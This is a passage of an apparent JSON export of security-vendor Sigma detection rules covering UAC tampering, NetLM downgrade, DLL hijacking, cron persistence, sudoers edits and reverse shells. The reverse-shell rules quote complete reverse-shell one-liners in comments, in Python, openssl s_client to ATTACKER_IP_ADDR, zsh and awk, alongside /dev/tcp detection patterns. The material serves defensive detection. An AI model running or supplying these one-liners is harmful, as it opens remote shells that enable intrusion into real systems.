ProcessParentImage: '?:\\Windows\\system32\\svchost.exe'\n\n exclusion_clickshare:\n ProcessCommandLine|endswith: '\\AppData\\Local\\Temp\\{????????-????-????-????-????????????}\\ClickShareButtonApp-{????????-????-????-????-????????????}.exe'\n # C:\\Windows\\System32\\DriverStore\\FileRepository\\barcoclicksharedrv.inf_amd64_2911b58ce63436e2\\BarcoClickShareSvc.exe\n ProcessGrandparentImage: '?:\\Windows\\System32\\DriverStore\\FileRepository\\barcoclicksharedrv.inf_*\\BarcoClickShareSvc.exe'\n Details: 'DWORD (0x00000002)'\n\n # c6d36742ebd7db317f2740a67c37ec08608f85ecdfa093315823cc37c5cc7d06\n exclusion_clickshare_2:\n ProcessImage: '?:\\ClickShareApp\\ClickShare\\app-?.??.?-???\\clickshare_native.exe'\n\n exclusion_vaudio:\n ProcessImage: '?:\\Program Files (x86)\\Common Files\\VAudio\\Audckq32.exe'\n ProcessParentImage: '?:\\Windows\\system32\\services.exe'\n Details: 'DWORD (0x00000004)'\n\n condition: selection and not 1 of filter_* and not 1 of exclusion_*\nlevel: low\n#level: medium\nconfidence: moderate\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "2b08e300-2cbf-4b7f-8b71-d33804657613",
"rule_name": "UAC Registry Configuration Modified",
"rule_description": "Detects a partial disabling of the UAC consent window in the User Account Control registry configuration.\nAttackers may change this configuration in order to locally elevate privileges quietly or allow future attackers to do so.\nIt is recommended to investigate this action to determine its legitimacy.\n",
"rule_creation_date": "2022-11-03",
"rule_modified_date": "2026-03-16",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1548"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "2b0a3397-e688-4bb7-ae09-07debeea1a9d",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.089034Z",
"creation_date": "2026-03-23T11:45:34.089036Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.089040Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://attack.mitre.org/techniques/T1595/002/"
],
"name": "t1595_002_linux_exp_suggester_perl.yml",
"content": "title: Linux-Exploit-Suggester Hacktool Executed via Perl\nid: 2b0a3397-e688-4bb7-ae09-07debeea1a9d\ndescription: |\n Detects common commands from linux-exploit-suggester-2.\n linux-exploit-suggester is an open-source Perl script for suggesting privilege escalation exploits on Linux.\n It is recommended to investigate the context of this execution to determine if this is a legitimate action conducted by an administrator to test his systems or if it is part of an attack.\n If so, it is recommended to block the user and isolate the machine for further forensics.\nreferences:\n - https://attack.mitre.org/techniques/T1595/002/\ndate: 2022/11/21\nmodified: 2025/04/14\nauthor: HarfangLab\ntags:\n - attack.reconnaissance\n - attack.t1595.002\n - classification.Linux.Source.ProcessCreation\n - classification.Linux.Script.Perl\n - classification.Linux.HackTool.LinuxExploitSuggester\n - classification.Linux.Behavior.Discovery\n - classification.Linux.Behavior.PrivilegeEscalation\nlogsource:\n category: process_creation\n product: linux\ndetection:\n selection:\n ParentImage|endswith: '/perl'\n CommandLine: 'sh -c uname -r |cut -d\"-\" -f1'\n condition: selection\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "2b0a3397-e688-4bb7-ae09-07debeea1a9d",
"rule_name": "Linux-Exploit-Suggester Hacktool Executed via Perl",
"rule_description": "Detects common commands from linux-exploit-suggester-2.\nlinux-exploit-suggester is an open-source Perl script for suggesting privilege escalation exploits on Linux.\nIt is recommended to investigate the context of this execution to determine if this is a legitimate action conducted by an administrator to test his systems or if it is part of an attack.\nIf so, it is recommended to block the user and isolate the machine for further forensics.\n",
"rule_creation_date": "2022-11-21",
"rule_modified_date": "2025-04-14",
"rule_os": "linux",
"rule_status": null,
"rule_tactic_tags": [],
"rule_technique_tags": [
"attack.t1595.002"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "2b16b989-2088-48a9-a2e4-ff125b31a00e",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "medium",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.621402Z",
"creation_date": "2026-03-23T11:45:34.621404Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.621408Z",
"rule_level": "medium",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://docs.microsoft.com/en-us/windows/security/threat-protection/security-policy-settings/network-security-lan-manager-authentication-level",
"www.ibm.com/think/x-force/remotemonologue-weaponizing-dcom-ntlm-authentication-coercions",
"https://attack.mitre.org/techniques/T1562/001/",
"https://attack.mitre.org/techniques/T1112/"
],
"name": "t1562_001_netlm_downgrade.yml",
"content": "title: NetLM Downgraded\nid: 2b16b989-2088-48a9-a2e4-ff125b31a00e\ndescription: |\n Detects the downgrade of the NetLM configuration in the Windows registry.\n The modification of LmCompatibilityLevel registry value to 2 or less disables the use of NTLMv2 session security.\n This weaken the security of network authentications and can be used by attackers to extract the NTLM hash.\n It is recommended to analyze the process responsible for this registry edit as well as for malicious actions in this user session.\nreferences:\n - https://docs.microsoft.com/en-us/windows/security/threat-protection/security-policy-settings/network-security-lan-manager-authentication-level\n - www.ibm.com/think/x-force/remotemonologue-weaponizing-dcom-ntlm-authentication-coercions\n - https://attack.mitre.org/techniques/T1562/001/\n - https://attack.mitre.org/techniques/T1112/\ndate: 2020/11/09\nmodified: 2026/03/16\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.t1562.001\n - attack.t1112\n - classification.Windows.Source.Registry\n - classification.Windows.Behavior.DefenseEvasion\n - classification.Windows.Behavior.SystemModification\nlogsource:\n product: windows\n category: registry_event\ndetection:\n selection:\n EventType: SetValue\n TargetObject: 'HKLM\\SYSTEM\\CurrentControlSet\\Control\\Lsa\\LmCompatibilityLevel'\n Details:\n - 'DWORD (0x00000000)'\n - 'DWORD (0x00000001)'\n - 'DWORD (0x00000002)'\n\n # This excludes registry modifications coming from local security strategies.\n exclusion_services:\n ProcessImage: '?:\\Windows\\System32\\services.exe'\n ProcessParentImage: '?:\\Windows\\System32\\wininit.exe'\n ProcessUserSID: 'S-1-5-18'\n\n exclusion_template_gpo:\n ProcessImage|endswith: '\\svchost.exe'\n ProcessCommandLine:\n - '?:\\Windows\\system32\\svchost.exe -k GPSvcGroup'\n - '?:\\WINDOWS\\system32\\svchost.exe -k GPSvcGroup -s gpsvc'\n - '?:\\Windows\\system32\\svchost.exe -k netsvcs -s gpsvc'\n - '?:\\Windows\\system32\\svchost.exe -k netsvcs -p -s gpsvc'\n - '?:\\Windows\\System32\\svchost.exe -k netsvcs' # (Windows Server 2012 and 2016)\n - '?:\\WINDOWS\\system32\\svchost.exe -k netsvcs -p'\n - '?:\\WINDOWS\\system32\\svchost.exe -k UserProfileService -p -s gpsvc'\n ProcessUserSID: 'S-1-5-18'\n ProcessParentImage: '?:\\Windows\\System32\\services.exe'\n\n exclusion_deviceenroller:\n ProcessImage: '?:\\Windows\\System32\\DeviceEnroller.exe'\n\n exclusion_sccm:\n ProcessAncestors|contains: '|?:\\MININT\\Tools\\X64\\TsManager.exe|?:\\MININT\\Tools\\X64\\TsmBootstrap.exe|'\n\n condition: selection and not 1 of exclusion_*\nlevel: medium\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "2b16b989-2088-48a9-a2e4-ff125b31a00e",
"rule_name": "NetLM Downgraded",
"rule_description": "Detects the downgrade of the NetLM configuration in the Windows registry.\nThe modification of LmCompatibilityLevel registry value to 2 or less disables the use of NTLMv2 session security.\nThis weaken the security of network authentications and can be used by attackers to extract the NTLM hash.\nIt is recommended to analyze the process responsible for this registry edit as well as for malicious actions in this user session.\n",
"rule_creation_date": "2020-11-09",
"rule_modified_date": "2026-03-16",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence"
],
"rule_technique_tags": [
"attack.t1112",
"attack.t1562.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "2b26abb8-6656-496d-8bdf-d47537666c04",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "medium",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.093694Z",
"creation_date": "2026-03-23T11:45:34.093696Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.093700Z",
"rule_level": "medium",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.003/T1053.003.md",
"https://attack.mitre.org/techniques/T1053/003/"
],
"name": "t1053_003_crontab_edit_macos.yml",
"content": "title: Cron Jobs Edited via Crontab (macOS)\nid: 2b26abb8-6656-496d-8bdf-d47537666c04\ndescription: |\n Detects the execution of the crontab command to edit cron jobs.\n An attacker could use crontab to add a malicious cron job for persistence.\n It is recommended to check the content of the file in command-line for any unwanted lines.\nreferences:\n - https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.003/T1053.003.md\n - https://attack.mitre.org/techniques/T1053/003/\ndate: 2022/11/14\nmodified: 2025/01/30\nauthor: HarfangLab\ntags:\n - attack.execution\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1053.003\n - classification.macOS.Source.ProcessCreation\n - classification.macOS.Behavior.Persistence\nlogsource:\n category: process_creation\n product: macos\ndetection:\n selection:\n Image: '/usr/bin/crontab'\n CommandLine|contains: ' -e'\n condition: selection\nlevel: medium\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "2b26abb8-6656-496d-8bdf-d47537666c04",
"rule_name": "Cron Jobs Edited via Crontab (macOS)",
"rule_description": "Detects the execution of the crontab command to edit cron jobs.\nAn attacker could use crontab to add a malicious cron job for persistence.\nIt is recommended to check the content of the file in command-line for any unwanted lines.\n",
"rule_creation_date": "2022-11-14",
"rule_modified_date": "2025-01-30",
"rule_os": "macos",
"rule_status": null,
"rule_tactic_tags": [
"attack.execution",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1053.003"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "2b4e82d9-d3b0-4aef-8866-05ac0d89d9f1",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.592619Z",
"creation_date": "2026-03-23T11:45:34.592625Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.592638Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://github.com/xforcered/WFH",
"https://securityintelligence.com/posts/windows-features-dll-sideloading/",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_rdpinput.yml",
"content": "title: DLL Hijacking via rdpinput.exe\nid: 2b4e82d9-d3b0-4aef-8866-05ac0d89d9f1\ndescription: |\n Detects potential Windows DLL Hijacking via rdpinput.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://github.com/xforcered/WFH\n - https://securityintelligence.com/posts/windows-features-dll-sideloading/\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2022/09/15\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'rdpinput.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith:\n - '\\winsta.dll'\n - '\\wtsapi32.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "2b4e82d9-d3b0-4aef-8866-05ac0d89d9f1",
"rule_name": "DLL Hijacking via rdpinput.exe",
"rule_description": "Detects potential Windows DLL Hijacking via rdpinput.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2022-09-15",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "2b5b655e-f7bb-4864-9202-ad7b2087ae12",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.095413Z",
"creation_date": "2026-03-23T11:45:34.095415Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.095419Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://book.hacktricks.xyz/generic-methodologies-and-resources/shells/linux",
"https://attack.mitre.org/techniques/T1059/006/"
],
"name": "t1059_006_reverse_shell_python_macos.yml",
"content": "title: Reverse Shell Executed via Python (macOS)\nid: 2b5b655e-f7bb-4864-9202-ad7b2087ae12\ndescription: |\n Detects a suspicious command line related to a reverse shell execution via Python.\n A reverse shell is a shell session that is initiated from a remote machine.\n Attackers often use reverse shell to bypass firewalls restrictions.\n It is recommended to check for malicious behavior by the process launching the command and its potential children.\nreferences:\n - https://book.hacktricks.xyz/generic-methodologies-and-resources/shells/linux\n - https://attack.mitre.org/techniques/T1059/006/\ndate: 2022/11/14\nmodified: 2025/01/10\nauthor: HarfangLab\ntags:\n - attack.execution\n - attack.t1059.006\n - classification.macOS.Source.ProcessCreation\n - classification.macOS.Script.Python\n - classification.macOS.Behavior.CommandAndControl\nlogsource:\n category: process_creation\n product: macos\ndetection:\n # export RHOST=\"127.0.0.1\";export RPORT=12345;python -c 'import sys,socket,os,pty;s=socket.socket();s.connect((os.getenv(\"RHOST\"),int(os.getenv(\"RPORT\"))));[os.dup2(s.fileno(),fd) for fd in (0,1,2)];pty.spawn(\"/bin/sh\")'\n # python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"10.0.0.1\",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([\"/bin/sh\",\"-i\"]);'\n selection_command:\n CommandLine|contains|all:\n - 'import'\n - 'socket'\n - '.socket('\n - '.connect('\n - 'os.dup2('\n - 'fileno()'\n\n selection_shell:\n CommandLine|contains:\n - '.spawn('\n - '.call('\n\n condition: all of selection_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "2b5b655e-f7bb-4864-9202-ad7b2087ae12",
"rule_name": "Reverse Shell Executed via Python (macOS)",
"rule_description": "Detects a suspicious command line related to a reverse shell execution via Python.\nA reverse shell is a shell session that is initiated from a remote machine.\nAttackers often use reverse shell to bypass firewalls restrictions.\nIt is recommended to check for malicious behavior by the process launching the command and its potential children.\n",
"rule_creation_date": "2022-11-14",
"rule_modified_date": "2025-01-10",
"rule_os": "macos",
"rule_status": null,
"rule_tactic_tags": [
"attack.execution"
],
"rule_technique_tags": [
"attack.t1059.006"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "2bade688-d13f-4317-9d07-3994ff35201f",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.623552Z",
"creation_date": "2026-03-23T11:45:34.623554Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.623559Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://hacktricks.wiki/en/generic-hacking/reverse-shells/linux.html",
"https://www.revshells.com/",
"https://attack.mitre.org/techniques/T1059/004/",
"https://attack.mitre.org/techniques/T1559/"
],
"name": "t1059_004_reverse_shell_command_line_linux.yml",
"content": "title: Reverse Shell Execution from Command-line\nid: 2bade688-d13f-4317-9d07-3994ff35201f\ndescription: |\n Detects different suspicious usages of the shell that are related to reverse shells.\n A reverse shell is shell session that is initiated from a remote machine.\n Attackers often use reverse shell to bypass firewall restrictions.\n It is recommended to investigate the process tree for suspicious activities.\nreferences:\n - https://hacktricks.wiki/en/generic-hacking/reverse-shells/linux.html\n - https://www.revshells.com/\n - https://attack.mitre.org/techniques/T1059/004/\n - https://attack.mitre.org/techniques/T1559/\ndate: 2022/07/01\nmodified: 2026/03/17\nauthor: HarfangLab\ntags:\n - attack.execution\n - attack.t1059.004\n - attack.t1559\n - classification.Linux.Source.ProcessCreation\n - classification.Linux.Behavior.NetworkActivity\n - classification.Linux.Behavior.RemoteShell\n - classification.Linux.Behavior.CommandAndControl\nlogsource:\n category: process_creation\n product: linux\ndetection:\n selection_command:\n CommandLine|contains:\n - 'http://reverse-shell.sh/'\n - 'https://reverse-shell.sh/'\n - 'sh -i*>*/dev/tcp/*'\n - 'sh -i*>*/dev/udp/*'\n - 'exec *<>*/dev/tcp/*'\n - 'exec *<>*/dev/udp/*'\n - 'sh*0>*/dev/tcp/'\n - 'sh*0>*/dev/udp/'\n - 'sh -i <&3 >&3 2>&3'\n # openssl s_client -quiet -connect :|/bin/bash|openssl s_client -quiet -connect :\n - 's_client*-connect*:*|*sh*|*s_client*-connect*:*'\n # mkfifo /tmp/s; /bin/sh -i < /tmp/s 2>&1 | openssl s_client -quiet -connect ATTACKER_IP_ADDR:443 > /tmp/s; rm /tmp/s\n - '2>&1*openssl*s_client'\n # zsh -c 'zmodload zsh/net/tcp && ztcp 10.10.10.10 9001 && zsh >&$REPLY 2>&$REPLY 0>&$REPLY'\n - 'zmodload zsh/net/tcp * ztcp'\n\n # awk 'BEGIN {s = \"/inet/tcp/0//\"; while(42) { do{ printf \"shell>\" |& s; s |& getline c; if(c){ while ((c |& getline) > 0) print $0 |& s; close(c); } } while(c != \"exit\") close(s); }}' /dev/null\n selection_awk_protocol:\n CommandLine|contains:\n - '/inet/tcp/'\n - '/inet/udp/'\n selection_awk_command:\n CommandLine|contains|all:\n - 'BEGIN '\n - 'printf'\n - 'getline '\n - 'close('\n\n exclusion_localhost:\n CommandLine|contains:\n - '/dev/tcp/127.0.0.1/'\n - '/dev/tcp/localhost/'\n - '/dev/udp/127.0.0.1/'\n - '/dev/udp/localhost/'\n\n exclusion_commandline:\n CommandLine|contains:\n - '/dev/tcp/$HOST/$PORT'\n - '/dev/tcp/${host}/${port}'\n\n exclusion_containerd:\n - ParentImage:\n - '/bin/runc'\n - '/bin/containerd-shim-runc-v2'\n - '/usr/bin/containerd-shim-runc-v2'\n - Ancestors|contains:\n - '|/bin/runc|'\n - '|/bin/containerd-shim-runc-v2|'\n - '|/usr/bin/containerd-shim-runc-v2|'\n\n condition: (selection_command or all of selection_awk_*) and not 1 of exclusion_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "2bade688-d13f-4317-9d07-3994ff35201f",
"rule_name": "Reverse Shell Execution from Command-line",
"rule_description": "Detects different suspicious usages of the shell that are related to reverse shells.\nA reverse shell is shell session that is initiated from a remote machine.\nAttackers often use reverse shell to bypass firewall restrictions.\nIt is recommended to investigate the process tree for suspicious activities.\n",
"rule_creation_date": "2022-07-01",
"rule_modified_date": "2026-03-17",
"rule_os": "linux",
"rule_status": null,
"rule_tactic_tags": [
"attack.execution"
],
"rule_technique_tags": [
"attack.t1059.004",
"attack.t1559"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "2bb34ffc-2356-4191-b774-bc4fc82ee828",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "medium",
"rule_effective_confidence": "weak",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-24T07:14:08.712525Z",
"creation_date": "2026-03-23T11:45:34.612480Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.612488Z",
"rule_level": "medium",
"rule_confidence": "weak",
"rule_confidence_override": null,
"references": [
"https://twitter.com/CraigHRowland/status/1580658905910108160/photo/1",
"https://attack.mitre.org/techniques/T1548/003/"
],
"name": "t1548_003_sudo_config_modified_linux.yml",
"content": "title: Sudo Configuration Modified (Linux)\nid: 2bb34ffc-2356-4191-b774-bc4fc82ee828\ndescription: |\n Detects a suspicious attempt to modify the content of '/etc/sudoers' or any file within '/etc/sudoers.d'.\n These files contain the configuration of the 'sudo' utility, used to give temporary privileges to an application.\n Their modification can be an attempt to elevate privileges.\n It is recommended to investigate the process responsible for this action for suspicious activities.\nreferences:\n - https://twitter.com/CraigHRowland/status/1580658905910108160/photo/1\n - https://attack.mitre.org/techniques/T1548/003/\ndate: 2022/10/27\nmodified: 2026/03/20\nauthor: HarfangLab\ntags:\n - attack.persistence\n - attack.privilege_escalation\n - attack.defense_evasion\n - attack.t1548.003\n - classification.Linux.Source.Filesystem\n - classification.Linux.Behavior.SystemModification\n - classification.Linux.Behavior.Persistence\n - classification.Linux.Behavior.PrivilegeEscalation\n - classification.Linux.Behavior.DefenseEvasion\nlogsource:\n category: filesystem_event\n product: linux\ndetection:\n selection:\n - Path:\n - '/etc/sudoers'\n - '/etc/sudoers.d/*'\n - TargetPath:\n - '/etc/sudoers'\n - '/etc/sudoers.d/*'\n\n filter_access_old:\n Kind: 'access'\n Permissions: 'read'\n\n filter_access_new:\n Kind:\n - 'read'\n - 'remove'\n - 'chmod'\n - 'chown'\n\n exclusion_dpkg:\n - ProcessImage: '/usr/bin/dpkg'\n - ProcessParentImage: '/usr/bin/dpkg'\n - ProcessGrandparentImage: '/usr/bin/dpkg'\n\n exclusion_dpkg_cmds:\n - ProcessCommandLine|contains:\n - '/usr/bin/dpkg-'\n - '/usr/sbin/dpkg-'\n - '/usr/bin/python* /usr/bin/reconfigure'\n - ProcessParentCommandLine|contains:\n - '/usr/bin/dpkg-'\n - '/usr/sbin/dpkg-'\n - ProcessGrandparentCommandLine|contains:\n - '/usr/bin/dpkg-'\n - '/usr/sbin/dpkg-'\n\n exclusion_apt:\n - ProcessImage: '/usr/bin/apt'\n - ProcessParentImage: '/usr/bin/apt'\n - ProcessGrandparentImage: '/usr/bin/apt'\n\n exclusion_yum:\n - ProcessCommandLine|startswith:\n - '/usr/bin/python* /bin/yum '\n - '/usr/bin/python* /usr/bin/yum '\n - '/usr/bin/python* /usr/sbin/yum-cron'\n - '/usr/libexec/platform-python /bin/yum '\n - '/usr/libexec/platform-python /usr/bin/yum '\n - ProcessParentCommandLine|startswith:\n - '/usr/bin/python* /bin/yum '\n - '/usr/bin/python* /usr/bin/yum '\n - '/usr/bin/python* /usr/sbin/yum-cron'\n - '/usr/libexec/platform-python /bin/yum '\n - '/usr/libexec/platform-python /usr/bin/yum '\n - ProcessGrandparentCommandLine|startswith:\n - '/usr/bin/python* /bin/yum '\n - '/usr/bin/python* /usr/bin/yum '\n - '/usr/bin/python* /usr/sbin/yum-cron'\n - '/usr/libexec/platform-python /bin/yum '\n - '/usr/libexec/platform-python /usr/bin/yum '\n\n exclusion_dnf:\n ProcessCommandLine|startswith:\n - '/usr/libexec/platform-python /bin/dnf '\n - '/usr/libexec/platform-python /usr/bin/dnf '\n - '/usr/libexec/platform-python /bin/dnf-automatic '\n - '/usr/libexec/platform-python /usr/bin/dnf-automatic'\n - '/usr/bin/python? /bin/dnf-automatic '\n - '/usr/bin/python? /usr/bin/dnf-automatic'\n - '/usr/bin/python? /bin/dnf '\n - '/usr/bin/python? /usr/bin/dnf '\n - '/usr/bin/python?.? /bin/dnf '\n - '/usr/bin/python?.? /usr/bin/dnf '\n - '/usr/bin/python?.? /usr/bin/dnf-automatic'\n\n exclusion_rpm:\n - ProcessImage: '/usr/bin/rpm'\n - ProcessGrandparentImage: '/usr/bin/rpm'\n\n exclusion_pacman:\n ProcessImage: '/usr/bin/pacman'\n\n exclusion_puppet:\n - ProcessImage: 